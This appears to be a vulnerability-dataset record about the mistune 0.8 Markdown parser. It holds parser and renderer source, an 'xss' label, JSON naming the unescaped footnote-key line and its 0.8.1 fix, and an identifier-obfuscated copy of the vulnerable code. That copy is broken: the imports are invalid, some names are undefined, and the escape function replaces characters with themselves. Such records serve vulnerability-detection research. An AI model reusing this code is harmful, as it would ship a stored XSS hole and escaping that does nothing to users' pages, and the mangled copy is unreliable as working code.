            cells[i] = re.split(r' *\| *', v)
        item['cells'] = cells
        self.tokens.append(item)
    def parse_nptable(self, m):
        # Table without leading pipes.
        item = self._process_table(m)
        cells = re.sub(r'\n$', '', m.group(3))
        cells = cells.split('\n')
        for i, v in enumerate(cells):
            cells[i] = re.split(r' *\| *', v)
        item['cells'] = cells
        self.tokens.append(item)
    def _process_table(self, m):
        """Build the table token header/align info shared by both table rules."""
        header = re.sub(r'^ *| *\| *$', '', m.group(1))
        header = re.split(r' *\| *', header)
        align = re.sub(r' *|\| *$', '', m.group(2))
        align = re.split(r' *\| *', align)
        # ':' placement in the separator row selects column alignment
        for i, v in enumerate(align):
            if re.search(r'^ *-+: *$', v):
                align[i] = 'right'
            elif re.search(r'^ *:-+: *$', v):
                align[i] = 'center'
            elif re.search(r'^ *:-+ *$', v):
                align[i] = 'left'
            else:
                align[i] = None
        item = {
            'type': 'table',
            'header': header,
            'align': align,
        }
        return item
    def parse_block_html(self, m):
        # Group 1 is only set for paired tags; otherwise it is a
        # comment / self-closing tag emitted verbatim.
        tag = m.group(1)
        if not tag:
            text = m.group(0)
            self.tokens.append({
                'type': 'close_html',
                'text': text
            })
        else:
            attr = m.group(2)
            text = m.group(3)
            self.tokens.append({
                'type': 'open_html',
                'tag': tag,
                'extra': attr,
                'text': text
            })
    def parse_paragraph(self, m):
        text = m.group(1).rstrip('\n')
        self.tokens.append({'type': 'paragraph', 'text': text})
    def parse_text(self, m):
        text = m.group(0)
        self.tokens.append({'type': 'text', 'text': text})
class InlineGrammar(object):
    """Grammars for inline level tokens."""
    # Backslash escapes of markdown punctuation.
    escape = re.compile(r'^\\([\\`*{}\[\]()#+\-.!_>~|])') # \* \+ \! ....
    # Span-level HTML: comment, paired tag, or self-closing tag.
    inline_html = re.compile(
        r'^(?:%s|%s|%s)' % (
            r'<!--[\s\S]*?-->',
            r'<(\w+%s)((?:%s)*?)\s*>([\s\S]*?)<\/\1>' % (
                _valid_end, _valid_attr),
            r'<\w+%s(?:%s)*?\s*\/?>' % (_valid_end, _valid_attr),
        )
    )
    # ``<url>`` or ``<email@host>``.
    autolink = re.compile(r'^<([^ >]+(@|:)[^ >]+)>')
    # ``[text](link "title")``; also matches images with a leading '!'.
    link = re.compile(
        r'^!?\[('
        r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
        r')\]\('
        r'''\s*(<)?([\s\S]*?)(?(2)>)(?:\s+['"]([\s\S]*?)['"])?\s*'''
        r'\)'
    )
    # ``[text][key]`` reference links.
    reflink = re.compile(
        r'^!?\[('
        r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
        r')\]\s*\[([^^\]]*)\]'
    )
    # ``[key]`` shortcut reference links.
    nolink = re.compile(r'^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]')
    # Bare http(s) URLs (GFM-style autolinking).
    url = re.compile(r'''^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])''')
    double_emphasis = re.compile(
        r'^_{2}([\s\S]+?)_{2}(?!_)' # __word__
        r'|'
        r'^\*{2}([\s\S]+?)\*{2}(?!\*)' # **word**
    )
    emphasis = re.compile(
        r'^\b_((?:__|[^_])+?)_\b' # _word_
        r'|'
        r'^\*((?:\*\*|[^\*])+?)\*(?!\*)' # *word*
    )
    code = re.compile(r'^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)') # `code`
    # Hard line break: two trailing spaces before the newline.
    linebreak = re.compile(r'^ {2,}\n(?!\s*$)')
    strikethrough = re.compile(r'^~~(?=\S)([\s\S]*?\S)~~') # ~~word~~
    # ``[^key]`` footnote references.
    footnote = re.compile(r'^\[\^([^\]]+)\]')
    # Plain text up to the next possible inline marker.
    text = re.compile(r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| {2,}\n|$)')
    def hard_wrap(self):
        """Grammar for hard wrap linebreak. You don't need to add two
        spaces at the end of a line.
        """
        self.linebreak = re.compile(r'^ *\n(?!\s*$)')
        self.text = re.compile(
            r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| *\n|$)'
        )
class InlineLexer(object):
    """Inline level lexer for inline grammars."""
    grammar_class = InlineGrammar
    # Rule names tried in order against the remaining text.
    default_rules = [
        'escape', 'inline_html', 'autolink', 'url',
        'footnote', 'link', 'reflink', 'nolink',
        'double_emphasis', 'emphasis', 'code',
        'linebreak', 'strikethrough', 'text',
    ]
    # Rules used when re-parsing the body of span-level HTML
    # (no inline_html and no footnotes inside HTML).
    inline_html_rules = [
        'escape', 'autolink', 'url', 'link', 'reflink',
        'nolink', 'double_emphasis', 'emphasis', 'code',
        'linebreak', 'strikethrough', 'text',
    ]
    def __init__(self, renderer, rules=None, **kwargs):
        self.renderer = renderer
        # links / footnotes: definitions collected by the block lexer,
        # installed via setup().
        self.links = {}
        self.footnotes = {}
        self.footnote_index = 0
        if not rules:
            rules = self.grammar_class()
        kwargs.update(self.renderer.options)
        if kwargs.get('hard_wrap'):
            rules.hard_wrap()
        self.rules = rules
        # state flags: inside a link body / inside a footnote body
        self._in_link = False
        self._in_footnote = False
        self._parse_inline_html = kwargs.get('parse_inline_html')
    def __call__(self, text, rules=None):
        return self.output(text, rules)
    def setup(self, links, footnotes):
        """Install link/footnote definitions before rendering a document."""
        self.footnote_index = 0
        self.links = links or {}
        self.footnotes = footnotes or {}
    def output(self, text, rules=None):
        """Render *text* by repeatedly applying the first matching rule."""
        text = text.rstrip('\n')
        if not rules:
            rules = list(self.default_rules)
        if self._in_footnote and 'footnote' in rules:
            # footnote references are not allowed inside footnote bodies
            rules.remove('footnote')
        output = self.renderer.placeholder()
        def manipulate(text):
            # A handler returning None means "no match" (e.g. unknown
            # reference key) and the next rule is tried.
            for key in rules:
                pattern = getattr(self.rules, key)
                m = pattern.match(text)
                if not m:
                    continue
                self.line_match = m
                out = getattr(self, 'output_%s' % key)(m)
                if out is not None:
                    return m, out
            return False # pragma: no cover
        while text:
            ret = manipulate(text)
            if ret is not False:
                m, out = ret
                output += out
                text = text[len(m.group(0)):]
                continue
            if text: # pragma: no cover
                raise RuntimeError('Infinite loop at: %s' % text)
        return output
    def output_escape(self, m):
        # Render the escaped character itself.
        text = m.group(1)
        return self.renderer.escape(text)
    def output_autolink(self, m):
        link = m.group(1)
        # '@' in the separator group marks an email address
        if m.group(2) == '@':
            is_email = True
        else:
            is_email = False
        return self.renderer.autolink(link, is_email)
    def output_url(self, m):
        link = m.group(1)
        if self._in_link:
            # no nested links: render the URL as plain text
            return self.renderer.text(link)
        return self.renderer.autolink(link, False)
    def output_inline_html(self, m):
        tag = m.group(1)
        if self._parse_inline_html and tag in _inline_tags:
            text = m.group(3)
            if tag == 'a':
                self._in_link = True
                text = self.output(text, rules=self.inline_html_rules)
                self._in_link = False
            else:
                text = self.output(text, rules=self.inline_html_rules)
            extra = m.group(2) or ''
            html = '<%s%s>%s</%s>' % (tag, extra, text, tag)
        else:
            html = m.group(0)
        return self.renderer.inline_html(html)
    def output_footnote(self, m):
        # Only defined, not-yet-referenced footnotes produce a ref anchor.
        key = _keyify(m.group(1))
        if key not in self.footnotes:
            return None
        if self.footnotes[key]:
            return None
        self.footnote_index += 1
        self.footnotes[key] = self.footnote_index
        return self.renderer.footnote_ref(key, self.footnote_index)
    def output_link(self, m):
        return self._process_link(m, m.group(3), m.group(4))
    def output_reflink(self, m):
        # ``[text][key]``; falls through (None) when the key is undefined.
        key = _keyify(m.group(2) or m.group(1))
        if key not in self.links:
            return None
        ret = self.links[key]
        return self._process_link(m, ret['link'], ret['title'])
    def output_nolink(self, m):
        # ``[key]`` shortcut reference.
        key = _keyify(m.group(1))
        if key not in self.links:
            return None
        ret = self.links[key]
        return self._process_link(m, ret['link'], ret['title'])
    def _process_link(self, m, link, title=None):
        """Dispatch a link-like match to the image or link renderer."""
        line = m.group(0)
        text = m.group(1)
        if line[0] == '!':
            # leading '!' marks an image; alt text is not inline-parsed
            return self.renderer.image(link, title, text)
        self._in_link = True
        text = self.output(text)
        self._in_link = False
        return self.renderer.link(link, title, text)
    def output_double_emphasis(self, m):
        text = m.group(2) or m.group(1)
        text = self.output(text)
        return self.renderer.double_emphasis(text)
    def output_emphasis(self, m):
        text = m.group(2) or m.group(1)
        text = self.output(text)
        return self.renderer.emphasis(text)
    def output_code(self, m):
        text = m.group(2)
        return self.renderer.codespan(text)
    def output_linebreak(self, m):
        return self.renderer.linebreak()
    def output_strikethrough(self, m):
        text = self.output(m.group(1))
        return self.renderer.strikethrough(text)
    def output_text(self, m):
        text = m.group(0)
        return self.renderer.text(text)
class Renderer(object):
    """The default HTML renderer for rendering Markdown.
    """
    def __init__(self, **kwargs):
        # Keep every keyword option; feature checks read them lazily.
        self.options = kwargs
    def placeholder(self):
        """Returns the default, empty output value for the renderer.
        All renderer methods use the '+=' operator to append to this value.
        Default is a string so rendering HTML can build up a result string with
        the rendered Markdown.
        Can be overridden by Renderer subclasses to be types like an empty
        list, allowing the renderer to create a tree-like structure to
        represent the document (which can then be reprocessed later into a
        separate format like docx or pdf).
        """
        return ''
    def block_code(self, code, lang=None):
        """Rendering block level code. ``pre > code``.
        :param code: text content of the code block.
        :param lang: language of the given code.
        """
        body = code.rstrip('\n')
        if lang:
            body = escape(body, quote=True, smart_amp=False)
            return '<pre><code class="lang-%s">%s\n</code></pre>\n' % (
                lang, body
            )
        body = escape(body, smart_amp=False)
        return '<pre><code>%s\n</code></pre>\n' % body
    def block_quote(self, text):
        """Rendering <blockquote> with the given text.
        :param text: text content of the blockquote.
        """
        return '<blockquote>%s\n</blockquote>\n' % text.rstrip('\n')
    def block_html(self, html):
        """Rendering block level pure html content.
        :param html: text content of the html snippet.
        """
        skip = self.options.get('skip_style')
        if skip and html.lower().startswith('<style'):
            return ''
        return escape(html) if self.options.get('escape') else html
    def header(self, text, level, raw=None):
        """Rendering header/heading tags like ``<h1>`` ``<h2>``.
        :param text: rendered text content for the header.
        :param level: a number for the header level, for example: 1.
        :param raw: raw text content of the header.
        """
        tag = 'h%d' % level
        return '<%s>%s</%s>\n' % (tag, text, tag)
    def hrule(self):
        """Rendering method for ``<hr>`` tag."""
        return '<hr />\n' if self.options.get('use_xhtml') else '<hr>\n'
    def list(self, body, ordered=True):
        """Rendering list tags like ``<ul>`` and ``<ol>``.
        :param body: body contents of the list.
        :param ordered: whether this list is ordered or not.
        """
        tag = 'ol' if ordered else 'ul'
        return '<%s>\n%s</%s>\n' % (tag, body, tag)
    def list_item(self, text):
        """Rendering list item snippet. Like ``<li>``."""
        return '<li>%s</li>\n' % text
    def paragraph(self, text):
        """Rendering paragraph tags. Like ``<p>``."""
        return '<p>%s</p>\n' % text.strip(' ')
    def table(self, header, body):
        """Rendering table element. Wrap header and body in it.
        :param header: header part of the table.
        :param body: body part of the table.
        """
        template = (
            '<table>\n<thead>%s</thead>\n'
            '<tbody>\n%s</tbody>\n</table>\n'
        )
        return template % (header, body)
    def table_row(self, content):
        """Rendering a table row. Like ``<tr>``.
        :param content: content of current table row.
        """
        return '<tr>\n%s</tr>\n' % content
    def table_cell(self, content, **flags):
        """Rendering a table cell. Like ``<th>`` ``<td>``.
        :param content: content of current table cell.
        :param header: whether this is header or not.
        :param align: align of current table cell.
        """
        tag = 'th' if flags['header'] else 'td'
        align = flags['align']
        if align:
            return '<%s style="text-align:%s">%s</%s>\n' % (
                tag, align, content, tag
            )
        return '<%s>%s</%s>\n' % (tag, content, tag)
    def double_emphasis(self, text):
        """Rendering **strong** text.
        :param text: text content for emphasis.
        """
        return '<strong>%s</strong>' % text
    def emphasis(self, text):
        """Rendering *emphasis* text.
        :param text: text content for emphasis.
        """
        return '<em>%s</em>' % text
    def codespan(self, text):
        """Rendering inline `code` text.
        :param text: text content for inline code.
        """
        return '<code>%s</code>' % escape(text.rstrip(), smart_amp=False)
    def linebreak(self):
        """Rendering line break like ``<br>``."""
        return '<br />\n' if self.options.get('use_xhtml') else '<br>\n'
    def strikethrough(self, text):
        """Rendering ~~strikethrough~~ text.
        :param text: text content for strikethrough.
        """
        return '<del>%s</del>' % text
    def text(self, text):
        """Rendering unformatted text.
        :param text: text content.
        """
        return text if self.options.get('parse_block_html') else escape(text)
    def escape(self, text):
        """Rendering escape sequence.
        :param text: text content.
        """
        return escape(text)
    def autolink(self, link, is_email=False):
        """Rendering a given link or email address.
        :param link: link content or email address.
        :param is_email: whether this is an email or not.
        """
        safe = escape_link(link)
        href = 'mailto:%s' % safe if is_email else safe
        return '<a href="%s">%s</a>' % (href, safe)
    def link(self, link, title, text):
        """Rendering a given link with content and title.
        :param link: href link for ``<a>`` tag.
        :param title: title content for `title` attribute.
        :param text: text content for description.
        """
        href = escape_link(link)
        if title:
            return '<a href="%s" title="%s">%s</a>' % (
                href, escape(title, quote=True), text
            )
        return '<a href="%s">%s</a>' % (href, text)
    def image(self, src, title, text):
        """Rendering a image with title and text.
        :param src: source link of the image.
        :param title: title text of the image.
        :param text: alt text of the image.
        """
        href = escape_link(src)
        alt = escape(text, quote=True)
        if title:
            tag = '<img src="%s" alt="%s" title="%s"' % (
                href, alt, escape(title, quote=True)
            )
        else:
            tag = '<img src="%s" alt="%s"' % (href, alt)
        closing = ' />' if self.options.get('use_xhtml') else '>'
        return tag + closing
    def inline_html(self, html):
        """Rendering span level pure html content.
        :param html: text content of the html snippet.
        """
        return escape(html) if self.options.get('escape') else html
    def newline(self):
        """Rendering newline element."""
        return ''
    def footnote_ref(self, key, index):
        """Rendering the ref anchor of a footnote.
        :param key: identity key for the footnote.
        :param index: the index count of current footnote.
        """
        safe = escape(key)
        return (
            '<sup class="footnote-ref" id="fnref-%s">'
            '<a href="#fn-%s">%d</a></sup>'
        ) % (safe, safe, index)
    def footnote_item(self, key, text):
        """Rendering a footnote item.
        :param key: identity key for the footnote.
        :param text: text content of the footnote.
        """
        back = (
            '<a href="#fnref-%s" class="footnote">↩</a>'
        ) % escape(key)
        body = text.rstrip()
        if body.endswith('</p>'):
            # splice the back-reference inside the trailing paragraph
            body = re.sub(r'<\/p>$', r'%s</p>' % back, body)
        else:
            body = '%s<p>%s</p>' % (body, back)
        return '<li id="fn-%s">%s</li>\n' % (escape(key), body)
    def footnotes(self, text):
        """Wrapper for all footnotes.
        :param text: contents of all footnotes.
        """
        html = '<div class="footnotes">\n%s<ol>%s</ol>\n</div>\n'
        return html % (self.hrule(), text)
class Markdown(object):
    """The Markdown parser.

    Drives a block-level lexer and an inline lexer over the source text
    and emits output through the given renderer.

    :param renderer: An instance of ``Renderer``.
    :param inline: An inline lexer class or instance.
    :param block: A block lexer class or instance.
    """
    def __init__(self, renderer=None, inline=None, block=None, **kwargs):
        if not renderer:
            renderer = Renderer(**kwargs)
        else:
            # Let the renderer's own options also configure the lexers.
            kwargs.update(renderer.options)
        self.renderer = renderer
        # ``inline``/``block`` may be given as classes; instantiate them.
        if inline and inspect.isclass(inline):
            inline = inline(renderer, **kwargs)
        if block and inspect.isclass(block):
            block = block(**kwargs)
        if inline:
            self.inline = inline
        else:
            self.inline = InlineLexer(renderer, **kwargs)
        self.block = block or BlockLexer(BlockGrammar())
        self.footnotes = []
        self.tokens = []
        # detect if it should parse text in block html
        self._parse_block_html = kwargs.get('parse_block_html')
    def __call__(self, text):
        return self.parse(text)
    def render(self, text):
        """Render the Markdown text.

        :param text: markdown formatted text content.
        """
        return self.parse(text)
    def parse(self, text):
        """Parse *text* and return the rendered output.

        Footnotes collected during the pass are appended to the end of
        the document, ordered by first reference.
        """
        out = self.output(preprocessing(text))
        keys = self.block.def_footnotes
        # reset block
        self.block.def_links = {}
        self.block.def_footnotes = {}
        # reset inline
        self.inline.links = {}
        self.inline.footnotes = {}
        if not self.footnotes:
            return out
        # Keep only footnotes that were actually referenced, sorted by
        # reference index (reversed so pop() below yields them in order).
        footnotes = filter(lambda o: keys.get(o['key']), self.footnotes)
        self.footnotes = sorted(
            footnotes, key=lambda o: keys.get(o['key']), reverse=True
        )
        body = self.renderer.placeholder()
        while self.footnotes:
            note = self.footnotes.pop()
            body += self.renderer.footnote_item(
                note['key'], note['text']
            )
        out += self.renderer.footnotes(body)
        return out
    def pop(self):
        # Consume the next token (the token list is stored reversed so
        # pop() walks the document front-to-back); None when exhausted.
        if not self.tokens:
            return None
        self.token = self.tokens.pop()
        return self.token
    def peek(self):
        # Look at the next token without consuming it.
        if self.tokens:
            return self.tokens[-1]
        return None # pragma: no cover
    def output(self, text, rules=None):
        # Tokenize *text* with the block lexer and render every token.
        self.tokens = self.block(text, rules)
        self.tokens.reverse()
        self.inline.setup(self.block.def_links, self.block.def_footnotes)
        out = self.renderer.placeholder()
        while self.pop():
            out += self.tok()
        return out
    def tok(self):
        t = self.token['type']
        # special case: '*_start' tokens dispatch to output_<name>()
        if t.endswith('_start'):
            t = t[:-6]
        return getattr(self, 'output_%s' % t)()
    def tok_text(self):
        # Merge consecutive 'text' tokens, then run inline rendering once.
        text = self.token['text']
        while self.peek()['type'] == 'text':
            text += '\n' + self.pop()['text']
        return self.inline(text)
    def output_newline(self):
        return self.renderer.newline()
    def output_hrule(self):
        return self.renderer.hrule()
    def output_heading(self):
        return self.renderer.header(
            self.inline(self.token['text']),
            self.token['level'],
            self.token['text'],
        )
    def output_code(self):
        return self.renderer.block_code(
            self.token['text'], self.token['lang']
        )
    def output_table(self):
        aligns = self.token['align']
        aligns_length = len(aligns)
        cell = self.renderer.placeholder()
        # header part
        header = self.renderer.placeholder()
        for i, value in enumerate(self.token['header']):
            # Columns beyond the align spec fall back to no alignment.
            align = aligns[i] if i < aligns_length else None
            flags = {'header': True, 'align': align}
            cell += self.renderer.table_cell(self.inline(value), **flags)
        header += self.renderer.table_row(cell)
        # body part
        body = self.renderer.placeholder()
        for i, row in enumerate(self.token['cells']):
            cell = self.renderer.placeholder()
            for j, value in enumerate(row):
                align = aligns[j] if j < aligns_length else None
                flags = {'header': False, 'align': align}
                cell += self.renderer.table_cell(self.inline(value), **flags)
            body += self.renderer.table_row(cell)
        return self.renderer.table(header, body)
    def output_block_quote(self):
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'block_quote_end':
            body += self.tok()
        return self.renderer.block_quote(body)
    def output_list(self):
        ordered = self.token['ordered']
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'list_end':
            body += self.tok()
        return self.renderer.list(body, ordered)
    def output_list_item(self):
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'list_item_end':
            # Bare text inside a tight list item skips paragraph wrapping.
            if self.token['type'] == 'text':
                body += self.tok_text()
            else:
                body += self.tok()
        return self.renderer.list_item(body)
    def output_loose_item(self):
        # Like output_list_item, but text tokens keep their paragraphs.
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'list_item_end':
            body += self.tok()
        return self.renderer.list_item(body)
    def output_footnote(self):
        # Collect the footnote body; parse() renders it at document end.
        self.inline._in_footnote = True
        body = self.renderer.placeholder()
        key = self.token['key']
        while self.pop()['type'] != 'footnote_end':
            body += self.tok()
        self.footnotes.append({'key': key, 'text': body})
        self.inline._in_footnote = False
        return self.renderer.placeholder()
    def output_close_html(self):
        text = self.token['text']
        return self.renderer.block_html(text)
    def output_open_html(self):
        text = self.token['text']
        tag = self.token['tag']
        # Optionally parse markdown inside non-preformatted block html.
        if self._parse_block_html and tag not in _pre_tags:
            text = self.inline(text, rules=self.inline.inline_html_rules)
        extra = self.token.get('extra') or ''
        html = '<%s%s>%s</%s>' % (tag, extra, text, tag)
        return self.renderer.block_html(html)
    def output_paragraph(self):
        return self.renderer.paragraph(self.inline(self.token['text']))
    def output_text(self):
        return self.renderer.paragraph(self.tok_text())
def markdown(text, escape=True, **kwargs):
    """Render markdown formatted text to html.

    :param text: markdown formatted text content.
    :param escape: if set to False, all html tags will not be escaped.
    :param use_xhtml: output with xhtml tags.
    :param hard_wrap: if set to True, it will use the GFM line breaks feature.
    :param parse_block_html: parse text only in block level html.
    :param parse_inline_html: parse text only in inline level html.
    """
    md = Markdown(escape=escape, **kwargs)
    return md(text)
| xss | {
"code": [
"__version__ = '0.8'",
" return _key_pattern.sub(' ', key.lower())",
" r'<(\\w+%s)((?:%s)*?)\\s*>([\\s\\S]*?)<\\/\\1>' % (_valid_end, _valid_attr),"
],
"line_no": [
14,
51,
448
]
} | {
"code": [
"__version__ = '0.8.1'",
" key = escape(key.lower(), quote=True)",
" r'<(\\w+%s)((?:%s)*?)\\s*>([\\s\\S]*?)<\\/\\1>' % (",
" _valid_end, _valid_attr),"
],
"line_no": [
14,
51,
449,
450
]
} |
import re
import .inspect
__version__ = '0.8'
__author__ = 'Hsiaoming Yang <me@lepture.com>'
__all__ = [
'BlockGrammar', 'BlockLexer',
'InlineGrammar', 'InlineLexer',
'Renderer', 'Markdown',
'markdown', 'escape',
]
VAR_0 = re.compile(r'\s+')
VAR_1 = re.compile(r'\W')
VAR_2 = re.compile(r'&(?!#?\w+;)')
VAR_3 = re.compile(r'\r\n|\r')
VAR_4 = re.compile(r'^ *> ?', VAR_71=re.M)
VAR_5 = re.compile(r'^ {4}', re.M)
VAR_6 = [
'a', 'em', 'strong', 'small', 's', 'cite', 'q', 'dfn', 'abbr', 'data',
'time', 'code', 'var', 'samp', 'kbd', 'sub', 'sup', 'i', 'b', 'u', 'mark',
'ruby', 'rt', 'rp', 'bdi', 'bdo', 'span', 'br', 'wbr', 'ins', 'del',
'img', 'font',
]
VAR_7 = ['pre', 'script', 'style']
VAR_8 = r'(?!:/|[^\w\s@]*@)\b'
VAR_9 = r'''\s*[a-zA-Z\-](?:\=(?:"[^"]*"|'[^']*'|[^\s'">]+))?'''
VAR_10 = r'(?!(?:%s)\b)\w+%s' % ('|'.join(VAR_6), VAR_8)
VAR_11 = ('javascript:', 'vbscript:')
def FUNC_0(VAR_12):
VAR_21 = VAR_12.pattern
if VAR_21.startswith('^'):
VAR_21 = pattern[1:]
return VAR_21
def FUNC_1(VAR_13):
return VAR_0.sub(' ', VAR_13.lower())
def VAR_19(VAR_14, VAR_15=False, VAR_16=True):
if VAR_16:
VAR_14 = VAR_2.sub('&', VAR_14)
else:
VAR_14 = VAR_14.replace('&', '&')
VAR_14 = VAR_14.replace('<', '<')
VAR_14 = VAR_14.replace('>', '>')
if VAR_15:
VAR_14 = VAR_14.replace('"', '"')
VAR_14 = VAR_14.replace("'", ''')
return VAR_14
def FUNC_3(VAR_17):
VAR_22 = VAR_17.lower().strip('\x00\x1a \n\r\t')
for scheme in VAR_11:
if re.sub(r'[^A-Za-z0-9\/:]+', '', VAR_22).startswith(scheme):
return ''
return VAR_19(VAR_17, VAR_15=True, VAR_16=False)
def FUNC_4(VAR_14, VAR_18=4):
VAR_14 = VAR_3.sub('\n', VAR_14)
VAR_14 = VAR_14.expandtabs(VAR_18)
VAR_14 = VAR_14.replace('\u2424', '\n')
VAR_21 = re.compile(r'^ +$', re.M)
return VAR_21.sub('', VAR_14)
class CLASS_0(object):
VAR_23 = re.compile(
r'^ *\[([^^\]]+)\]: *' # [VAR_13]:
r'<?([^\s>]+)>?' # <VAR_49> or VAR_49
r'(?: +["(]([^\n]+)[")])? *(?:\n+|$)'
)
VAR_24 = re.compile(
r'^\[\^([^\]]+)\]: *('
r'[^\n]*(?:\n+|$)' # [^VAR_13]:
r'(?: {1,}[^\n]*(?:\n+|$))*'
r')'
)
VAR_25 = re.compile(r'^\n+')
VAR_26 = re.compile(r'^( {4}[^\n]+\n*)+')
VAR_27 = re.compile(
r'^ *(`{3,}|~{3,}) *(\S+)? *\n' # ```VAR_63
r'([\s\S]+?)\s*'
r'\1 *(?:\n+|$)' # ```
)
VAR_28 = re.compile(r'^ {0,3}[-*_](?: *[-*_]){2,} *(?:\n+|$)')
VAR_29 = re.compile(r'^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)')
VAR_30 = re.compile(r'^([^\n]+)\n *(=|-)+ *(?:\n+|$)')
VAR_31 = re.compile(r'^( *>[^\n]+(\n[^\n]+)*\n*)+')
VAR_32 = re.compile(
r'^( *)([*+-]|\d+\.) [\s\S]+?'
r'(?:'
r'\n+(?=\1?(?:[-*_] *){3,}(?:\n+|$))' # VAR_28
r'|\n+(?=%s)' # def VAR_60
r'|\n+(?=%s)' # def VAR_61
r'|\n{2,}'
r'(?! )'
r'(?!\1(?:[*+-]|\d+\.) )\n*'
r'|'
r'\s*$)' % (
FUNC_0(VAR_23),
FUNC_0(VAR_24),
)
)
VAR_33 = re.compile(
r'^(( *)(?:[*+-]|\d+\.) [^\n]*'
r'(?:\n(?!\2(?:[*+-]|\d+\.) )[^\n]*)*)',
VAR_71=re.M
)
VAR_34 = re.compile(r'^ *(?:[*+-]|\d+\.) +')
VAR_35 = re.compile(
r'^((?:[^\n]+\n?(?!'
r'%s|%s|%s|%s|%s|%s|%s|%s|%s'
r'))+)\n*' % (
FUNC_0(VAR_27).replace(r'\1', r'\2'),
FUNC_0(VAR_32).replace(r'\1', r'\3'),
FUNC_0(VAR_28),
FUNC_0(VAR_29),
FUNC_0(VAR_30),
FUNC_0(VAR_31),
FUNC_0(VAR_23),
FUNC_0(VAR_24),
'<' + VAR_10,
)
)
VAR_36 = re.compile(
r'^ *(?:%s|%s|%s) *(?:\n{2,}|\s*$)' % (
r'<!--[\s\S]*?-->',
r'<(%s)((?:%s)*?)>([\s\S]*?)<\/\1>' % (VAR_10, VAR_9),
r'<%s(?:%s)*?\s*\/?>' % (VAR_10, VAR_9),
)
)
VAR_37 = re.compile(
r'^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*'
)
VAR_38 = re.compile(
r'^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*'
)
VAR_14 = re.compile(r'^[^\n]+')
class CLASS_1(object):
VAR_39 = CLASS_0
VAR_40 = [
'newline', 'hrule', 'block_code', 'fences', 'heading',
'nptable', 'lheading', 'block_quote',
'list_block', 'block_html', 'def_links',
'def_footnotes', 'table', 'paragraph', 'text'
]
VAR_41 = (
'newline', 'block_code', 'fences', 'lheading', 'hrule',
'block_quote', 'list_block', 'block_html', 'text',
)
VAR_42 = (
'newline', 'block_code', 'fences', 'heading',
'nptable', 'lheading', 'hrule', 'block_quote',
'list_block', 'block_html', 'table', 'paragraph', 'text'
)
def __init__(self, VAR_43=None, **VAR_20):
self.tokens = []
self.def_links = {}
self.def_footnotes = {}
if not VAR_43:
rules = self.grammar_class()
self.rules = VAR_43
def __call__(self, VAR_14, VAR_43=None):
return self.parse(VAR_14, VAR_43)
def FUNC_6(self, VAR_14, VAR_43=None):
VAR_14 = VAR_14.rstrip('\n')
if not VAR_43:
rules = self.default_rules
def FUNC_84(VAR_14):
for VAR_13 in VAR_43:
VAR_104 = getattr(self.rules, VAR_13)
VAR_44 = VAR_104.match(VAR_14)
if not VAR_44:
continue
getattr(self, 'parse_%s' % VAR_13)(VAR_44)
return VAR_44
return False # pragma: no cover
while VAR_14:
VAR_44 = FUNC_84(VAR_14)
if VAR_44 is not False:
VAR_14 = FUNC_59[len(VAR_44.group(0)):]
continue
if VAR_14: # pragma: no cover
raise RuntimeError('Infinite loop at: %s' % VAR_14)
return self.tokens
def FUNC_7(self, VAR_44):
VAR_77 = len(VAR_44.group(0))
if VAR_77 > 1:
self.tokens.append({'type': 'newline'})
def FUNC_8(self, VAR_44):
VAR_54 = VAR_5.sub('', VAR_44.group(0))
self.tokens.append({
'type': 'code',
'lang': None,
'text': VAR_54,
})
def FUNC_9(self, VAR_44):
self.tokens.append({
'type': 'code',
'lang': VAR_44.group(2),
'text': VAR_44.group(3),
})
def FUNC_10(self, VAR_44):
self.tokens.append({
'type': 'heading',
'level': len(VAR_44.group(1)),
'text': VAR_44.group(2),
})
def FUNC_11(self, VAR_44):
self.tokens.append({
'type': 'heading',
'level': 1 if VAR_44.group(2) == '=' else 2,
'text': VAR_44.group(1),
})
def FUNC_12(self, VAR_44):
self.tokens.append({'type': 'hrule'})
def FUNC_13(self, VAR_44):
VAR_46 = VAR_44.group(2)
self.tokens.append({
'type': 'list_start',
'ordered': '.' in VAR_46,
})
VAR_45 = VAR_44.group(0)
self._process_list_item(VAR_45, VAR_46)
self.tokens.append({'type': 'list_end'})
def FUNC_14(self, VAR_45, VAR_46):
VAR_45 = self.rules.list_item.findall(VAR_45)
VAR_78 = False
VAR_77 = len(VAR_45)
for VAR_101 in range(VAR_77):
VAR_79 = VAR_45[VAR_101][0]
VAR_94 = len(VAR_79)
VAR_79 = self.rules.list_bullet.sub('', VAR_79)
if '\n ' in VAR_79:
VAR_94 = VAR_94 - len(VAR_79)
VAR_21 = re.compile(r'^ {1,%d}' % VAR_94, VAR_71=re.M)
VAR_79 = VAR_21.sub('', VAR_79)
VAR_95 = VAR_78
if not VAR_95 and re.search(r'\n\n(?!\s*$)', VAR_79):
VAR_95 = True
VAR_96 = len(VAR_79)
if VAR_101 != VAR_77 - 1 and VAR_96:
VAR_78 = VAR_79[VAR_96-1] == '\n'
if not VAR_95:
VAR_95 = VAR_78
if VAR_95:
VAR_89 = 'loose_item_start'
else:
VAR_89 = 'list_item_start'
self.tokens.append({'type': VAR_89})
self.parse(VAR_79, self.list_rules)
self.tokens.append({'type': 'list_item_end'})
def FUNC_15(self, VAR_44):
self.tokens.append({'type': 'block_quote_start'})
VAR_45 = VAR_4.sub('', VAR_44.group(0))
self.parse(VAR_45)
self.tokens.append({'type': 'block_quote_end'})
def FUNC_16(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
self.def_links[VAR_13] = {
'link': VAR_44.group(2),
'title': VAR_44.group(3),
}
def FUNC_17(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
if VAR_13 in self.def_footnotes:
return
self.def_footnotes[VAR_13] = 0
